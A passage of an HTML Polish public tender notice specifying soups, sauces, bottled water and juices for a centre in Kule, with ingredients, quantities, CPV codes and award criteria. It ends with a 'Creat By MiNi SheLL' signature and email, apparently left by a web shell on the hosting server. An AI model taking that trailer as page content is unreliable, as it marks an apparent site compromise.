                    15614100-6,
                    15623000-1,
                    15800000-6,
                    15820000-2,
                    15821000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Najkrótszy czas wymiany wadliwego towaru</td><td>20</td></tr><tr><td>Zawartość GMO w artykułach spożywczych</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawy  zup i sosów dla OSSW w Kulach <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>l.p.	Nazwa artykułu	Opis przedmiotu zamówienia	Jednostka miary	Ilość
1	Sos myśliwski	Op jedn 0,5-2 kg. Składniki: zasmażka( mąka pszenna, tłuszcz roślinny, boczek wieprzowy wędzony prażony nie mniej niż 5,5 %, pieczarki suszone nie mniej niż 5 %, sól, tłuszcz roślinny, substancje wzmacniające smak i zapach, cebula suszona nie mniej niż 2,5%,  liść laurowy, majeranek. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
2	Sos pieczarkowo-borowikowy	Op jedn 0,5-2kg. Składniki: zasmażka, ( mąka pszenna, tłuszcz roślinny), tłuszcz roślinny, sól, ekstrakt z pieczarek suszony nie mniej niż 4 %, białka mleka, substancje wzmacniające smak i zapach, pieczarki suszone nie mniej niż 1,5%, borowiki suszone nie mniej niż 1 %, mąka pszenna, ekstrakt drożdżowy suszony, aromaty, natka pietruszki suszona, cukier. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
3	Sos sałatkowy ogrodowy	Op jedn 0,5-2kg. Składniki: laktoza, sól, cukier,  natka pietruszki, gorczyca, szczypiorek, cebula, olej roślinny, ekstrakt drożdżowy suszony, pieprz,  czosnek. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
4	Sos z zielonym pieprzem	Op jedn 0,5-2 kg. Składniki: zasmażka ( mąka pszenna, tłuszcz roślinny, ) sól, tłuszcz roślinny, ; aromaty ( w tym pszenica) , cukier, pieprz zielony liofilizowany nie mniej niż 1,5%), pieprz, czosnek,  majeranek. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
5	Sos grzybowy	Op jedn 0,5-2kg. Składniki: zasmażka ( mąka pszenna, tłuszcz roślinny),  tłuszcz roślinny, laktoza, pieczarki suszone nie mniej niż 4 %, sól, białka mleka, ekstrakt grzybowy suszony, (pieczarka, borowik) nie mniej niż 2,5 %,  smak i zapach; glutaminian sodu, mąka pszenna, borowiki suszone nie mniej niż 1,5%, aromaty, ekstrakt drożdżowy suszony, barwnik. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.  	kg	10
6	Sos do spagetti	Składniki: koncentrat pomidorowy, tłuszcz roślinny, mąka ryżowa, maltodekstryna, cukier, cebula, sól jodowana, ekstrakty drożdżowe, czosnek, syrop karmelowy, papryka czerwona, skrobia, tymianek, rozmaryn, oregano, majeranek, aromaty. Op jedn 0,5-2kg. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
7	Sos węgierski	Op jedn 0,5-2kg. Składniki: pomidory suszone nie mniej niż 31 %, sól, cukier, tłuszcz roślinny, papryka  nie mniej niż 4%, boczek wędzony prażony nie mniej niż 3,4%,  skrobia, cebula suszona, pieprz czarny. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
8	Zupa borowikowa	Zupa krem z borowików. Op jedn 1-3 kg. Składniki: mąka pszenna, tłuszcz roślinny, skrobia,  borowiki suszone nie mniej niż 5%, białka mleka, ekstrakt grzybowy suszony (pieczarki, borowiki) nie mniej niż  2,9 %; cebula suszona,  aromaty, natka pietruszki, pieprz. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
9	Zupa szparagowa	Op jedn 1- 3 kg. Składniki: skrobia, tłuszcz roślinny, szparagi suszone nie mniej niż 8 %, mąka pszenna, cebula suszona, cukier, białka mleka. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
10	Zupa pieczarkowa	Op jedn. 1- 3 kg. Składniki: mąka pszenna, tłuszcz roślinny,ekstrakt z pieczarek nie mniej niż 2 %, pieczarki suszone nie mniej niż1,5%, cebula prażona, aromaty, pieprz. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
11	Żurek w proszku	Op jedn.1 - 3kg. Składniki: skrobia, mleko odtłuszczone w proszku, mąka żytnia nie mniej niż 14,5 %, sól, płatki ziemniaczane, boczek wieprzowy wędzony prażony nie mniej niż 5,%, tłuszcz roślinny, cebula prażona, ekstrakt drożdżowy, suszony, czosnek, majeranek, liść laurowy, pieprz. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy. 	kg	25
12	Rosół z kury	Op jedn 1 - 3 kg. Składniki: sól , substancje wzmacniające smak i zapach, tłuszcz kurzy (2- 8%), aromaty ( w tym pochodne mleka i jaj), skrobia, mięso kurze suszone (0,6-2 %), cebula prażona, przyprawy,pieprz biały, gałka muszkatołowa. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	20
13	Zupa brokułowa	Op jedn. 1- 3kg. Składniki: mąka pszenna, skrobia, sól, tłuszcz roślinny,  brokuły suszone  nie mniej niż 6 %,  białka mleka, cukier, aromaty, cebula suszona, ekstrakt drożdżowy suszony, pieprz,  gałka muszkatołowa. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
14	Zupa porowa	Op jedn 1-3 kg. Składniki: mąka pszenna, tłuszcz roślinny, sól, skrobia, por suszony nie mniej niż 6,5%, substancja wzmacniająca smak i zapach. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
15	Sos tomato pronto	Op jedn 1-3 kg. Baza sosu pomidorowego z kawałkami pomidorów o płynnej konsystencji. Składniki: pomidory  nie mniej niż 78%, koncentrat pomidorowy  nie mniej niż 18 %, olej roślinny, sól, cukier, cebula suszona. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	kg	10
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15891400-4, 15871200-6,
                    15894000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Najkrótszy czas wymiany wadliwego towaru</td><td>20</td></tr><tr><td>Zawartość GMO w artykułach spożywczych</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Dostawy wody i soków dla OSSW w Kulach<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>l.p.	Nazwa artykułu	Opis przedmiotu zamówienia	Jednostka miary	Ilość
1	Sok owocowy	Opakowanie jednostkowe : karton ze słomką poj. 0,200 l smak: pomarańczowy i jabłkowy sok 100%. Wyprodukowany z soku zagęszczonego. Pasteryzowany, niegazowany. Bez dodatku cukru, zawierający cukry naturalne występujące w owocach. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	l	700
2	Sok pomarańczowy	Opakowanie jednostkowe: karton, poj. 1 litr  Smak soku: pomarańczowy w 100%, wyprodukowany z soku zagęszczonego, pasteryzowany, niegazowany bez dodatku cukrów, zawierający cukry naturalnie występujące w owocach. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	l	2000
3	Sok grapefruitowy	Opakowanie jednostkowe: karton, poj. 1 litr  Smak soku: grapefruitowy czerwony w 100%, wyprodukowany z soku zagęszczonego, z dodatkiem cukru, pasteryzowany, niegazowany. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	l	300
4	Woda mineralna	Jurajska lub równoważna. Op. jednostkowe PET 0,5 l nie wchodzące w reakcję z związkami mineralnymi rozpuszczonymi w wodzie  i posiadające atest o dopuszczeniu do kontaktu z żywnością. Opakowanie zbiorcze zgrzew. Termokurczliwa. Konsystencja płynna  bezbarwny płyn , klarowny, bez osadów i innych zanieczyszczeń, smak i zapach -  bezwonna i bez obcych posmaków, woda pochodząca z udokumentowanych zasobów podziemnych.  Cechy dyskwalifikujące: brak lub niedostateczne nasycenia dwutlenkiem węgla ( dotyczy wody gazowanej) , obce posmaki zapach, smak gorzki, kwaśny, stęchły , mdły, zanieczyszczenia mechaniczne, zawartość środków  bakteriostatycznych lub stosowanie wszelkich innych zabiegów mogących zmienić własną mikroflorę naturalnej wody mineralnej, objawy psucia zmętnienia, uszkodzenia mechaniczne butelek, brak oznakowania, nieszczelność, obecność zanieczyszczeń chemicznych i bakterii.  Woda nasycona i nienasycona dwutlenkiem węgla niskosodowa , średnio zmineralizowana  woda czerpana ze złoża głębinowego. Proporcja wapnia do magnezu 2:1. Zawart.wapnia nie mniej niż 50 mg/l, a magnezu nie mniej niż 25mg/l . Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy	l	4000
5	Woda mineralna	"Jurajska" lub równoważna. Op. jednostkowe PET 1,5 l nie wchodzące w reakcję z związkami mineralnymi rozpuszczonymi w wodzie i posiadające atest o dopuszczeniu do kontaku z żywnością. Opakowanie zbiorcze zgrzew. Termokurczliwa. Konsystencja płynna - bezbarwny płyn, klarowny, bez osadów i innych zanieczyszczeń, smak i zapach - bezwonny i bez obcych posmaków. Cechy dyskwalifikujące: brak lub niedostateczne nasycenia dwutlenkiem węgla ( dotyczy wody gazowanej), obce posmaki, zapach, smak gorzki, kwaśny, stęchły, mdły, zanieczyszczenia mechaniczne, zawartość środków bakteriostatycznych lub stosowanie wszelkich innych zabiegów mogących zmienić własną mikroflorę naturalnej wody mineralnej, objawy psucia, zmętnienia, uszkodzenia mechaniczne butelek, brak oznakowania, nieszczelność, obecność zanieczyszczeń chemicznych i bakterii. Woda nasycona i nienasycona dwutlenkiem węgla niskosodowa, średnio zmineralizowana woda czerpana ze złoża głębinowego. Proporcja wapnia do magnezu 2:1. Zawartość wapnia nie mniej niż 66mg/l, a magnezu nie mniej niż 32mg/l. Termin przydatności do spożycia powinien wynosić nie mniej niż 180 dni od daty dostawy.	l	7500
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15321000-4, 15321100-5,
                    15321200-6,
                    15981000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Najkrótszy czas wymiany wadliwego towaru</td><td>20</td></tr><tr><td>Zawartość GMO w artykułach spożywczych</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com